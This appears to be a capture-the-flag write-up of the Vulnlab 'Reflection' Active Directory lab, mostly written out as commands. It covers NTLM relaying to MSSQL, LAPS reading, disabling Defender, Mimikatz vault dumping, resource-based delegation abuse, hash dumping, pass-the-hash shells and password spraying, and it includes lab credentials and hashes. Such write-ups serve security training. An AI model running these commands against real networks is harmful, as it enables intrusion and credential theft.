# Vulnlab - Reflection # NMAP ## DC01.reflection.vl ```bash PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-08-13 18:24:44Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped syn-ack ttl 127 1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM |_ssl-date: 2023-08-13T18:26:16+00:00; -1s from scanner time. 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped syn-ack ttl 127 3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49682/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 62571/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows ``` ## MS01.reflection.vl ```bash Host is up, received echo-reply ttl 127 (0.21s latency). Scanned at 2023-08-13 21:52:56 PKT for 264s Not shown: 65531 filtered tcp ports (no-response) PORT STATE SERVICE REASON VERSION 135/tcp open tcpwrapped syn-ack ttl 127 445/tcp open tcpwrapped syn-ack ttl 127 3389/tcp open tcpwrapped syn-ack ttl 127 |_ssl-date: 2023-08-13T16:57:16+00:00; -2s from scanner time. | ssl-cert: Subject: commonName=ms01.reflection.vl 5985/tcp open tcpwrapped syn-ack ttl 127 1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM |_ms-sql-info: ERROR: Script execution failed (use -d to debug) |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug) | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 2048 ``` ## WS01.reflection.vl ```bash Host is up, received echo-reply ttl 127 (0.22s latency). Scanned at 2023-08-13 21:52:56 PKT for 264s Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE REASON VERSION 135/tcp open tcpwrapped syn-ack ttl 127 445/tcp open tcpwrapped syn-ack ttl 127 3389/tcp open tcpwrapped syn-ack ttl 127 | ssl-cert: Subject: commonName=ws01.reflection.vl ``` ## PORT 445 (SMB) Enumerating the smb shares from the machines, we only get list of shares with null authentication on `MS01` Accessing `staging` share we'll get `staging_db.conf` file having credentials With `crackmapexec` we can try to authenticate on smb to verify if these are valid credentials ```bash cme smb hosts.txt -u 'web_staging' -p 'Washroom510' ``` We can try authenticating over MSSQL as that service is running on DC01 and MS01 ```bash cme mssql hosts.txt -u 'web_staging' -p 'Washroom510' --local-auth ``` We get a vaild login so we can proceed with using `mssqlclient.py` from impacket ```bash mssqlclient.py web_staging:'Washroom510'@10.10.173.134 ``` Since `xp_cmdshell` was not allowed for this user We can try using `xp_dirtree` to coerce the server to our machine in order to retrieve NTLMv2 hash of service account of mssql But cracking this hash didn't worked as well So we can't crack this hash, maybe we can relay as smb signing is disabled With `ntlmrelayx.py` we can realy the hash and authenticate It shows that relaying on smb worked, we can also try to relay it on mssql running on DC01 which will allow us to execute queries as `svc_web_staging` ```bash ntlmrelayx.py -t mssql://10.10.173.133 -smb2support --query 'SELECT @@version' ``` We can enumerate the databases, as here's there's one called `prod` ```bash ntlmrelayx.py -t mssql://10.10.132.133 -smb2support --query 'SELECT name FROM master.dbo.sysdatabases;' ``` But listing the tables in that database didn't worked as this user doesn't have access , trying to enable xp_cmdshell didn't worked here as well So there was nothing we could do from here but as saw previously that svc_web_staging was able to authenticate smb we can list shares and try to access shares from DC01, for this we need to use socks proxy as it's going to keep the smb connection open and also lists the relays which were successful ```bash ntlmrelayx.py -tf hosts.txt -smb2support -socks ``` It does show that this user is not an admin but still we can access the smb shares as a domain user with `smbclient` To my surprise this didn't worked and I don't know the reason, maybe it's an issue with my version of smbclient but with smbclient.py from impacket worked like a charm ```bash proxychains smbclient.py reflection/svc_web_staging@10.10.132.133 ``` From `prod` share we can grab `prod_db.conf` ' Having the credentials for the production, we can enumerate the database ```powershell mssqlclient.py web_prod:Tribesman201@10.10.132.133 ``` From the `users` table we'll get set of two credentials On verifying these credentials, both of them are domain users So now we can enumerate the domain with `bloodhound` , before doing that make sure to edit the hosts file for dc01.reflection.vl entry ```bash python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'reflection.vl' -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' -ns 10.10.132.133 -c all ``` From bloodhound we see these two users are part of Staff group But Staff group didn't had any ACLs, abbie had `GenericAll` on `MS01` Unfortunately we can't just add a computer object as there's 0 machine quota However, since we have GenericAll, we can read LAPS on MS01 which is a randomized password for local administrator ```bash cme smb 10.10.132.134 -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' --laps ``` ```bash evil-winrm -i 10.10.132.134 -u 'administrator' -p 'H447.++h6g5}xi' ``` Disabling the defender with `Set-MpPreference -DisableRealtimeMonitoring $true` Uploading netcat and getting a shell again as evil-winrm was causing an issue with mimikatz From the cache, we see `Georgia.Price` With `vault::cred /patch` we can list the credentials from the credential vault Going back to bloodhound, this user also has `GenericAll` on `WS01` We know that there's no machine quota available but we do have access to MS01, we can add that machine in WS01's `msDS-AllowedToActOnBehalfOfOtherIdentity` property, for this we need to get the NThash of MS01 Editing the `msDS-AllowedToActOnBehalfOfOtherIdentity` with `rbcd.py` from impacket ```bash rbcd.py -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.188.197 "Reflection/Georgia.Price:DBl+5MPkpJg5id" ``` After adding the property, we can impersonate the administrator ticket on WS01 with `getST.py` ```bash getST.py -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.188.197 'Reflection/MS01$' -hashes ':6e77d4ac157a47c5581681b8f865677e' ``` And now we can dump hashes from WS01 ```bash secretsdump.py administrator@WS01.reflection.vl -k -no-pass ``` Since defender was enable on WS01 we couldn't get a shell through psexec.py We can however use `atexec.py` to schedule the commands to be executed in order disable defender ```bash atexec.py ws01/administrator@10.10.188.199 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02' ``` After this, we'll be able to use psexec to get a shell ```bash psexec.py administrator@WS01.reflection.vl -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02' ``` As we already dumped hashes, we have Rhys.Garner's password who is a local admin on WS01, this user didn't had any ACLs on any object, checking the domain admins, there are 2 domain admins We can try spraying the password on them to see if we can get access to those users Which worked on `DOM_RGARNER`, with this we can login on DC01 through winrm and become domain admin # References - https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/ - https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd - https://tools.thehacker.recipes/impacket/examples/atexec.py